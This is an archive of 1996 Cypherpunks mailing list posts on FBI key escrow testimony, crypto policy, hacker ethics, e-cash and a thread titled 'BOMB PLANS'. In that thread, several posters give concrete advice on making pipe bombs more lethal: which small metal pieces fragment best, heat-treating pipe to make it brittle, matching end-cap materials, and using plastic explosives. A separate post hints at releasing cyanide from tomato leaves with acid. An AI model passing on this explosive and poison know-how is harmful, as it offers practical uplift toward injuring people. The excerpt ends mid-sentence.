> >>    have been clamoring for the right to encrypt as securely as
> >>    possible, Mr. Freeh and others argue, "the genie is not yet
> >>    out of the bottle" on "robust," meaning uncrackable,
> >>    encryption.
> >
> >Are they going to magically erase all copies of strong software that
> >is already currently available? (Side note: the Pacifica news report
> >on Friday notes that while Freeh gave his testimony, over 100 copies
> >of PGP were downloaded from MIT's site.)
> 
> What he's saying is that US-exported copies of the Lotus Lockshens,
> Microsoft Machayas, and Netscape Niguns of the world still do not contain
> robust crypto the USG cannot read.
> 

Which they should, I might add.

> >Particularly absent in the WaPo-ed is that many do not trust the
> >authorities (in the US and elsewhere)--particularly the FBI, which
> >has a long history of extra-legal surveillance.
> 
> So as Netanyahu says at length we need to build in protections against
> abuses, using both the legislature and the judiciary.
> 

Oh, yes oh wise one.  We need protections against free speech.  The First
Amendment was designed to hurt us.  Seig Hiel!

 --Deviant
The first version always gets thrown away.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfvwjzAJap8fyDMVAQH3DAf7BXgEFQEYJebKjJAUTdg6y8PtweuyoBGZ
SEXDQLrxSTQYc2XGHw917jT3SiYk2+gqD6I7I54dUeGUk1MvSFUsmEDYxdK6WYSs
h3vLosEc+g+DPcX2C0mFafI2oImLmN4xmLfTnxaSnLXhCsYfbqze1xSzZeBgWKf9
8Ylf2WL8PoSnF6gCYY1axv4TAuagr/1J3Dz+pP4gC030JJpxAfvNo6cUMFLKV8i/
Jtt3C+TWVG4B9+6qmCiRZ7hEgerqHSKGH94zvQ9zNF5D7FuBR217mmX4bg5ZBcTy
57I54AfKnOCr3ZD9s43EqLL2pwnavMVdW+jvOPIGkHdnNEdc25rwIA==
=6DT+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 29 Jul 1996 13:42:37 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: BOMB PLANS
In-Reply-To: <Pine.SUN.3.91.960728175909.9109A-100000@crl13.crl.com>
Message-ID: <Pine.LNX.3.94.960728232111.2457A-100000@gak>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713600.multipart/signed"

--Boundary..3943.1071713600.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Sun, 28 Jul 1996, Sandy Sandfort wrote:

> The Sunday San Francisco Examiner had an article about how simple
> it is to make a pipe bomb.  It was syndicated from the Dallas
> Morning News.  In the article a "federal bomb expert" opined:
> 
> 	They're probably one of the more common explosive
> 	devices that are encountered.  That's because the
> 	pipe not only provides a container, but fragments
> 	into sharapnel."                        ^^^^^^^^^
> 	^^^^^^^^^^^^^^
> Now I don't know what takes to qualify one as a "bomb expert,"
> but the standards must be pretty low.  The reason hand grenades
> look like pineapples is because it's very difficult to get metal
> to fragment unless it is scored or otherwise predisposed to come
> apart in little pieces.  What I've been told is that a pipe bomb
> just peals open at it's weakest place and otherwise stays in one
> piece.  Don't know, but that's what I've heard.  Makes sense to
> me.

You're right.  A pipe bomb isn't even technically a "bomb".  It just has
various combustible chemicals within a sealed container.  The explosive force
is just due to the high pressure released.  Nails and screws can be used as
shrapnel, but if the container was scored, the explosive force would be
weakened.  Newer hand grenades have scored wire wrapped around the core so
when it explodes, the container is shattered and the wire fragments fly out
at very high speeds.  I would guess that these are more powerful than the
"pineapple" grenades.

-- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  



--Boundary..3943.1071713600.multipart/signed
Content-Type: application/octet-stream; name="pgp00008.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00008.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
CmlRQ1ZBd1VCTWZ3d2FiWmMrc3Y1c2l1bEFRRTRZZ1FBcVJYc2lMZjI2RFZB
Mi9lY1JqSTBYVGZIMVBiTTdtM3QKQXVXSHg4NUdQQ005VW9GY0VCZFZ1U3k0
cU1qcGJZc3NYVm9tMTNCMTVJbCt2MytNb0VxclQ5WFlHWjFjeVZJUgpLVnkv
azZTaHA1cnNBVmVUVUU0KzljOE82Y0xxT1Q0MlRJd0RmWHovQjQrdkFaSEhR
b3ZjQi9nTVBmdXZNNTVXCmNoVnF6ZnNLaE5ZPQo9NzdXeAotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3943.1071713600.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 29 Jul 1996 14:03:12 +0800
To: cypherpunks@toad.com
Subject: SET in Java
Message-ID: <v03007606ae21e56b0f83@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Sun, 28 Jul 1996 11:40:33 -0700
From: tedg@doppio.Eng.Sun.COM (Ted Goldstein)
To: set-discuss@commerce.net, bjueneman@novell.com
Subject: SET in Java
Mime-Version: 1.0

Content-MD5: nhtCOgaiveb2ol2V4sPdow==
Sender: owner-set-talk@commerce.NET
Precedence: bulk

+----------------------------------------------------+
Addressed to: set-discuss@commerce.net
+----------------------------------------------------+

JavaSoft is developing a SET implementation as part of the
Java Electronic Commerce Framework (http://java.sun.com/commerce).

For more information, feel free to contact me.

Thanks,
Ted Goldstein
Chief Java Commerce Officer,
JavaSoft, Sun Microsystems Inc.
(408) 343-1675
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message was sent by set-discuss@commerce.net.  For a complete listing
of available commands, please send mail to 'majordomo@commerce.net'
with 'help' (no quotations) contained within the body of your message.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 29 Jul 1996 14:22:17 +0800
To: cypherpunks@toad.com
Subject: Re: BOMB PLANS
Message-ID: <960729000357_247766065@emout15.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


welllll pipe bombs do fragment. Years ago someone decided to try to put one
under my step brothers truck tire....... needless to say...nothing happened
to the truck or our house in front of the truck but next door and across the
street..the houses were sprayed with metal fragments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 29 Jul 1996 14:00:29 +0800
To: wombat@mcfeely.bsfs.org
Subject: Re: ALL OF YOU ARE CRIMIN
Message-ID: <960729000545_247767161@emout17.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Obviously this was someone trying to be anoying and someone that wasnt too
serious. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 29 Jul 1996 10:18:10 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: your favorite poison recipes
In-Reply-To: <199607282123.OAA06727@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.960729000839.558A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 28 Jul 1996, jim bell wrote:

> Date: Sun, 28 Jul 1996 14:22:40 -0800
> From: jim bell <jimbell@pacifier.com>
> To: cypherpunks@toad.com
> Subject: Re: your favorite poison recipes
> 
> At 12:11 PM 7/28/96 -0700, anonymous-remailer@shell.portal.com wrote:
> >Please post your favorite poison recipes to this mlist.
> 
> 
> I recommend a book called "Handbook for Poisoners," by Raymond Bond.  While 
> it is mostly a collection of (mostly fictional) poison stories, the forward 
> is a rather extensive non-fictional summary of poisons as was commonly known 
> when the book was written, in 1950 or so.  The main problem is that it 
> doesn't include the various anticholinesterases then known, such as Tabun or 
> Sarin.
> 

Speaking of poison's, and finding pipe-bomb info on the net and such, i
might add that it is probably safer to let your children on the net than
it is to let them play near a vegitable garden.  That is, at least if you
grow tomatos...

 --Deviant
Whatever occurs from love is always beyond good and evil.
		-- Friedrich Nietzsche

P.S. -- for those who don't know, Tomatos were, for many years, thought to
be poisonous, and whoever ate them and lived were considered to be
witches.  The reason for this is that tomato leaves have a high
concentration of CN in them.  If you don't know what CN is, just remember
not to eat any  tomato leaves, and don't drop them in HCl either.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfwCJzAJap8fyDMVAQFNZAf/T3XPwEHYMyt2IbNKFLhu7Jm44xRatC0x
yaKVP6PRYewrea4My6UuSKsLZi+oHI0Ffhk9Ij/IOQUJNIg34YdCiE++h5r/gWiD
q1rC0EteqpMhmlRwzk0XqMCFIdP4S5gBpYKe/s5939s6cTQHIiF3YeN1Y5XbUrl9
sFQuKQkL+SuOqdYPmihyWL5qjt2+q41wE2wc+rEVLJSQYPfeu73Vb5o8ap6IvFKq
yzm8bFKJ+4cDAFFmDPLkhbNxgc+qtvO6y1ZqnV4wnnHyeZejiZIlP/j5HbN8ER15
FGvzt7u3s++CFtNjWUvrgCHbJ69QnYwvRrCsqYZybfDN7ph/uBy1EA==
=uqsa
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Mon, 29 Jul 1996 16:45:34 +0800
To: "Mark M." <markm@voicenet.com>
Subject: Re: BOMB PLANS
In-Reply-To: <Pine.LNX.3.94.960728232111.2457A-100000@gak>
Message-ID: <Pine.LNX.3.93.960729004157.1617B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 28 Jul 1996, Mark M. wrote:
> On Sun, 28 Jul 1996, Sandy Sandfort wrote:
> > but the standards must be pretty low.  The reason hand grenades
> > look like pineapples is because it's very difficult to get metal
> > to fragment unless it is scored or otherwise predisposed to come
> > apart in little pieces.  What I've been told is that a pipe bomb
> > just peals open at it's weakest place and otherwise stays in one
> > piece.  Don't know, but that's what I've heard.  Makes sense to
> > me.
> You're right.  A pipe bomb isn't even technically a "bomb".  It just has
> various combustible chemicals within a sealed container.  The explosive force
> is just due to the high pressure released.  Nails and screws can be used as
> shrapnel, but if the container was scored, the explosive force would be
> weakened.  Newer hand grenades have scored wire wrapped around the core so
> when it explodes, the container is shattered and the wire fragments fly out
> at very high speeds.  I would guess that these are more powerful than the
> "pineapple" grenades.

     I don't know about "more powerful", but they are more effective, and 
IIRC a little smaller & lighter. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Mon, 29 Jul 1996 18:34:34 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re:BOMB PLANS
Message-ID: <v02140b00ae222dfbe500@[205.254.160.238]>
MIME-Version: 1.0
Content-Type: text/plain


Sandy write:
>
> The Sunday San Francisco Examiner had an article about how simple
> it is to make a pipe bomb.  It was syndicated from the Dallas
> Morning News.  In the article a "federal bomb expert" opined:
>
>         They're probably one of the more common explosive
>         devices that are encountered.  That's because the
>         pipe not only provides a container, but fragments
>         into sharapnel."                        ^^^^^^^^^
>         ^^^^^^^^^^^^^^
> Now I don't know what takes to qualify one as a "bomb expert,"
> but the standards must be pretty low.  The reason hand grenades
> look like pineapples is because it's very difficult to get metal
> to fragment unless it is scored or otherwise predisposed to come
> apart in little pieces.

This is no longer true with respect to hand grenades and was not really
accurate wrt the old pineapple grenades.  Modern grenades are pre-scored
to produce good fragments, in fact one reason for abandoning the old
grenades was that they fragmented into only a few large chunks along
the weakest stress lines of the pineapple gripping and this did not
produce the desired effect (which is lots of little high-KE pieces, four
or five big pieces with relatively low-KE were produced by the pineapple
grenades...)  An equivalent effect for a pipe bomb would be produced by
mixing in a handful of brads, wire cut into 5mm lengths, or tacks, most
"recipes" for such devices I have seen tell someone to mix in nails.  This
is really stupid if you consider that most people only have relatively big
nails sitting around and coupled with the volume restriction of a pipe
bomb you will get the same poor effects as the old hand grenades.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jul 1996 02:37:01 +0800
To: cypherpunks@toad.com
Subject: Re: Schelling Points leads to interesting family investment opportunities
Message-ID: <ae20dd0b00021004b7f1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 PM 7/28/96, Ian Grigg wrote:
>Hi Tim,
>
>you said:
>> The _costs_ of extending beyond the Schelling point boundaries
>> is deemed to be too high, and the boundary persists.
>
>This reminds me of the transactional theory of business units.
>Working from memory, the optimal size of a business unit is
>positively related to the cost of the transactions conducted
>between units, other things being held constant.
>
>Thus, in a place where it is "expensive to do business" the
>dominant form of company will be large.  Conversely in a
>cheap business environment, small companies will predominate.
>This notion spurs one to examine the transactional costs and
>to decide (or not) to lower them...

Yes, I think these things are deeply intertwined. Coase's work on the
nature of corporations, for example. (Another connection is that economics
and markets are largely about "signalling mechanisms," and it can be argued
that prices are variants of Schelling points, albeit hopping around as
other market players jockey for advantage.)

>The interesting part for your family context is that falling
>transaction costs have purportedly produced a shift away from
>large companies to smaller units.  Those falling costs are in
>the sphere of digital communications, other technology, and
>regulation.  If such were to apply to the context of families,
>upbringing children and education in general, one might
>predict that the size of the family should shrink.

Which it has, as you note. The availability of microwave dinners,
transportation to new jobs, new employment patterns, and other factors too
numerable to mention are correlated fairly strongly with a reduction in the
size of the average family.


>One would then be lead to ask, if you are proposing that
>Internet technologies in general and crypto in particular
>are influences on the Schelling points related to the family
>rights set, can this result in smaller family units?

I wouldn't go quite  _this_ far! (And it's hard to go too much further than
we have already...as you noted, increasing numbers of Westerners are
single.)

Certainly your comments are generally relevant and interesting, and
sociologists should have fun examining the economic, game-theoretic,
psychological, and other factors that are interlinked.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jul 1996 02:52:46 +0800
To: cypherpunks@toad.com
Subject: Feinstein wants controls on Internet, Books
Message-ID: <ae20e54404021004a690@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



One of my senators, Senator Dianne Feinstein, is now arguing on CNN for
controls on information put on the Internet, on censorship of books and
articles describing how pipe bombs work, and for making it easier to get
wiretaps against those suspected of committing thought crimes.

One or two more major incidents on top of the recent ones (World Trade
Center, Oklahoma City, Dharan, TWA 800, and Olympic Village) and I suspect
Congress will simply vote to repeal the Bill of Rights and just be done
with this whole experiment in liberty.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 29 Jul 1996 04:13:02 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks vs hackers
Message-ID: <ae20fb3806021004ceb4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:59 PM 7/28/96, pjn@nworks.com wrote:
> In> How can we differentiate cypherpunks to hackers? What are their
> In> attitudes, psychological thinking, main objective?
>
> It is interesting to note that while both groups have opposite
> objectives (Hackers want all information free, where cypherpunks want
> everbody to be able to have privacy), and yet in there own ways, they
> are both right.

I don't believe this is an accurate picture of "what hackers want." The
"information wants to be free" view is one facet of the outlook of
many--but not all--hackers.

Rather than debate semantics of the definition of "hacker," or ask others
to suggest definitions, it might be better for interested folks to read
some of the various books on the topic and then decide for themselves. Some
of them are:

- Levy, "Hackers," of course

- Haffner and Markoff, "Cyberpunk"

- Sterling's book on hackers

- any one (but not more) of the several Shimomura v. Mitnick books

etc.

--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pluto@well.com (cp)
Date: Mon, 29 Jul 1996 15:54:43 +0800
To: cypherpunks@toad.com
Subject: E-cash
Message-ID: <m0ukifW-000omgC@berlin.snafu.de>
MIME-Version: 1.0
Content-Type: text/plain


Salve,

As another idea to prevent the netizen from being a sitting duck for the gov
and the big mailorder companys:

Get an account at MarkTwain!

Do it now!

Pluto

**********************************************************************
P           pluto@inx.de            P        Free information!       #
G->        pluto@well.com         <-G    Freedom through knowledge.  #
P     www.well.com/user/pluto/      P      Wisdom for all!! =:-)     #
**********************************************************************
+--HI, I'm a signature virus  :-)  Copy me into your sign to join in. ---+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 29 Jul 1996 15:25:18 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: BOMB PLANS
In-Reply-To: <Pine.SUN.3.91.960728175909.9109A-100000@crl13.crl.com>
Message-ID: <Pine.LNX.3.94.960729051513.747B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 28 Jul 1996, Sandy Sandfort wrote:

> Date: Sun, 28 Jul 1996 18:17:28 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: BOMB PLANS
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 

[usefull info deleted]

> 
>  S a n d y
> 
> P.S.	On an odder note, the same paper had an article 
> 	entitled, "Two-headed baby born in Tijuana." 
> 	The article reported, "...the child (sic) had
> 	been born with two spinal columns and two heads"
> 	One of the more bizarre statements was, "It's
> 	not clear whether un-named girl--or girls--are
> 	Siamese twins."

Technicly, Siamese twins must have certain ammounts of organs
independantly, and certain amounts share, within a certain amount of body
space.  Anything else is just unsplit twins. ;)

 --Deviant
Old MacDonald had an agricultural real estate tax abatement.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfxJnjAJap8fyDMVAQH7xQf8CC/qzRa76hW8G8Q9a4/To2i0Bi4vwWuT
JmQfaBBLPdAHZFhBLKvl2E0YtB9Pa+oRu4/G2/4UAqNhlH1skOeabW7MzQZQg7L7
n9+is8rkgIA9Kv8iNMP16Co3goTRQRu/PbAjB77Fyc5A6f/B3y4UI8K4twuPyJSz
bC9w6OU/uRyiUF8VaEPe2zBqTrh90je17Il90sLgmHp+whNU/3a01kGIVK15ji3B
qdhVXxRIgCK1UF6fh38KjVWV52/GVt1xXuEOM/14bknhZHNyHfjHQlj4aMGuWGyY
SqJtpo1dJ6yi9jkA7Qn2nkKb+rq/BK+ciMlrzRJDCwY0IhqRveL16g==
=q2Xk
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Mon, 29 Jul 1996 23:56:06 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks vs hacker
Message-ID: <TCPSMTP.16.7.29.6.6.26.2645935021.657071@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 >  It is interesting to note that while both groups have opposite
 >  objectives (Hackers want all information free, where cypherpunks want
 >  everbody to be able to have privacy), and yet in there own ways, they
 >  are both right.

 In> I don't entirely agree with this.  I think both groups want
 In> information to be free, but also want people to be able to have
 In> privacy.  Most hackers (used in the sense of people who break into
 In> computers) attack computers owned by such companies as TRW and the
 In> phone companies.  Both of these systems have little regard for privacy.
 In> Most non-malicious hackers promote system security, but at the same
 In> time, don't like government-controlled monopolies and agencies to be
 In> able to keep secret information that should be free.  A very
 In> interesting paper by Dorothy Denning (she used to be regarded very
 In> highly by the hacker community before she started to support Clipper)
 In> expresses some of the concerns and morals of hackers.  It's called
 In> "Concerning Hackers Who Break Into Computer Systems" and is in Phrack
 In> issue 32. 
 > 
 I have read the file (I have all Phracks from the beginning.  Crypt is
 good too, but they dont have the same level of information as Phrack) 
 and I though that it was very inciteful (sp).


 >  I think what we need to define is the diffrence between hackers and
 >  crackers. A hacker breaks into a computer like a cracker (but the 
 >  similarities end there).  The hacker just want to look and learn, 
 >  possably "map out" the system just to see how everything works with
 >  everything else.  Crackers break into computers for the sake of 
 >  destroying or stealing information or the system itself.

 In> That's debatable.  I think many people incorrectly consider these
 In> terms to be mutually exclusive.  There are many hackers (used in the
 In> sense defined in the Jargon File) who also break into systems and could
 In> therefore be considered crackers also.  Most hackers definitely have
 In> the knowledge to break into computer systems, but many crackers aren't
 In> very well versed in programming and learn how to break into computers
 In> by using canned programs and G-files. 
 
 I am saying that hackers do break into computers, but crackers are more
 malicious in their intent.  And yes, pathetic hackers rely on programs.
 I have respect for hackers who do all the work themselfs.
 
 > 
 >  Both cypherpunks and hackers think that the government is wrong
 >  in many things that they do.

 In> Agreed.


  P.J.
  pjn@nworks.com



... Sorry, the dog ate my Blue Wave packet.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Mon, 29 Jul 1996 21:49:11 +0800
To: cypherpunks@toad.com
Subject: Re: cypherpunks vs hacker
Message-ID: <TCPSMTP.16.7.29.6.6.32.2645935021.657072@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> Rather than debate semantics of the definition of "hacker," or ask
 In> others to suggest definitions, it might be better for interested folks
 In> to read some of the various books on the topic and then decide for
 In> themselves. Some of them are:

 In> - Levy, "Hackers," of course

   Very good history.

 In> - Haffner and Markoff, "Cyberpunk"



 In> - Sterling's book on hackers

   Hacker Crackdown.

 In> - any one (but not more) of the several Shimomura v. Mitnick books

   I think that Markoffs book on the incident was written beter then the 
   rest.

   I might also suggest:

   - Masters of Deception

   - The Cuckoos Egg by Stoll




   P.J.
   pjn@nworks.com



... Resistance is futile, taglines will assimilate your hard drive.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 29 Jul 1996 22:12:04 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: WaPo on Crypto-Genie Terrorism
Message-ID: <199607291030.GAA29365@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 28 Jul 96 at 12:59, David Sternlight wrote:

> >IMO, the US does not have a comfortable lead. It's already falling
> >behind considering some of the stronger crypto programs available (at
> >least as freeware) are made outside the US.  Many of the stronger
> >algorithms were invented outside of the US (IDEA for instance).
> 
> This, and similar remarks by others, consistently misses the point which I
> have been making for about a year now, and which Director Freeh finally
> made explicit in his testimony last week. That is--the government is
> concerned with mass market software incorporating robust crypto, used
> overseas, and recognizes that they can't keep niche products off the
[..]

Really? The RAR archiver is getting quite popular (DOS and OS/2), and uses
a variation of DES in the encryption (according to the authors).  An 
Italian archiver called CODEC also uses DES.  PGP gets more publicity than
any crypto product around (CNN, NPR, Pacifica, NYTimes,  etc.) and will
likely get bigger as time goes on and as the arguments over escrow proposals
get louder.  MS's C[r]API and Netscape also make people more aware of 
strong crypto...

> Though I've no connection with Freeh, it's interesting that his language is
> almost word for word the same as what I've been using. Do you suppose some
> of his staff reads my stuff?

Actually, I don't care one whit.

> >So why should criminals bother with using standards if they are
> >readable by authorities?
> 
> See above.

Doesn't counter my question/argument.  Serious criminals with a few 
braincells who care about wiretapping or protecting their files from 
the authorities will  obviously not use anything that the government
can read.

Even a ban on unescrowed crypto worldwide will not help.  Every copy 
of strong crypto software will not magically disappear upon the 
signing of such treaties and laws.

[..]
> >Are they going to magically erase all copies of strong software that
> >is already currently available? (Side note: the Pacifica news report
> >on Friday notes that while Freeh gave his testimony, over 100 copies
> >of PGP were downloaded from MIT's site.)
> 
> What he's saying is that US-exported copies of the Lotus Lockshens,
> Microsoft Machayas, and Netscape Niguns of the world still do not contain
> robust crypto the USG cannot read.

So?  People can use alternate programs to encrypt the software, such 
as PGP.
[..]
> >It's not clear that terrorism can be tracked, even if it's unencrypted.
> >The OK and WTC bombings were apparently not encrypted, and there's
> >some allegations that the authorities had advanced warnings of the
> >latter.
> 
> He says it can, and suggests following the banking trail among other
> things. We know the government has already had good success with this
[..]

Apparently not successful enough, as the two examples I posted 
happened successfully.  Banking trails will exist with or without 
escrow.

[..]
> >Particularly absent in the WaPo-ed is that many do not trust the
> >authorities (in the US and elsewhere)--particularly the FBI, which
> >has a long history of extra-legal surveillance.
> 
> So as Netanyahu says at length we need to build in protections against
> abuses, using both the legislature and the judiciary.

1. The damage is already done if rights are violated, irregardless of 
the law.  If the police listen in on your phone conversations because 
of your political views, you may have legal recourse.... but they've 
already listened in.

2. Legislative/judicial protections are meaningless if judges don't 
follow up on them.  Historically they give leeway to the police, and 
as of late judges that enforce the technicalities are lambasted 
publicly for letting criminals go free.

3. Israel isn't exactly a prime example of human rights, especially 
if you're a Palestinian.

Rob
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 29 Jul 1996 23:16:02 +0800
To: cypherpunks@toad.com
Subject: International Standards
Message-ID: <2.2.32.19960729103852.008b5154@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Mr. Freeh, 
   testifying at Thursday's hearing in favor of an optional 
   key escrow plan, noted that the point is not to prevent all 
   copies of uncrackable code from going abroad --  that's 
   clearly impossible -- but to prevent such high-level code 
   from becoming the international standard, with architecture 
   and transmission channels all unreadable to world 
   authorities.


Looks like the fibbies (FBI) haven't been reading the "Proceedings of the
IETF".  Strong crypto is already an international standard.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Mon, 29 Jul 1996 17:24:47 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Terrorists are adult Kids?
In-Reply-To: <199607290336.WAA27752@manifold.algebra.com>
Message-ID: <Pine.LNX.3.94.960729063858.886A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


- ----PLEASE NOTE: NOTHING DESCRIBED IN THIS POST IS A PARTICURLY GOOD IDEA----

On Sun, 28 Jul 1996, Igor Chudov @ home wrote:

> Date: Sun, 28 Jul 1996 22:36:39 -0500 (CDT)
> From: "Igor Chudov @ home" <ichudov@algebra.com>
> To: Sandy Sandfort <sandfort@crl.com>
> Cc: cypherpunks@toad.com, scrm@manifold.algebra.com
> Subject: Terrorists are adult Kids?
> 
> To: sandfort@crl.com (Sandy Sandfort)
> Cc: cypherpunks@toad.com, scrm
> Subject: Terrorists are adult Kids?
> 
> Sandy Sandfort wrote:
> > The Sunday San Francisco Examiner had an article about how simple
> > it is to make a pipe bomb.  It was syndicated from the Dallas
> > Morning News.  In the article a "federal bomb expert" opined:
> >
> > 	They're probably one of the more common explosive
> > 	devices that are encountered.  That's because the
> > 	pipe not only provides a container, but fragments
> > 	into sharapnel."                        ^^^^^^^^^
> > 	^^^^^^^^^^^^^^
> > Now I don't know what takes to qualify one as a "bomb expert,"
> > but the standards must be pretty low.  The reason hand grenades
> > look like pineapples is because it's very difficult to get metal
> > to fragment unless it is scored or otherwise predisposed to come
> > apart in little pieces.  What I've been told is that a pipe bomb
> > just peals open at it's weakest place and otherwise stays in one
> > piece.  Don't know, but that's what I've heard.  Makes sense to
> > me.
> 
> It depends on the quality of metal the pipe is made from. If it
> has a lot of carbon the pipe indeed can split into small pieces.
> Also, as far as I remember, if you heat the pipe red and then throw it
> into water and repeat this process several times, the metal may
> become very fragile.

Well, yes, but not just that... The force (and indeed the type of
explosion) caused by a pipe bomb depends on several things, including (but
not limited to), the type of pipe, the type of explosives, and the
material used to seal the ends of the pipe.

Idealy you would use gauged copper pipe (copper bends, tears, etc,
comparitvly easy), with copper stopping at the end.  The stopping needs to
be the same material as the pipe,  or else there will be significantly
less gass-expansion when the bomb goes off (i.e., the end is the weekest
point, you've made a rather shitty shotgun).  One might also conceive of
using actuall explosives (C4, Semtex, plasticene) in a pipe bomb, rather
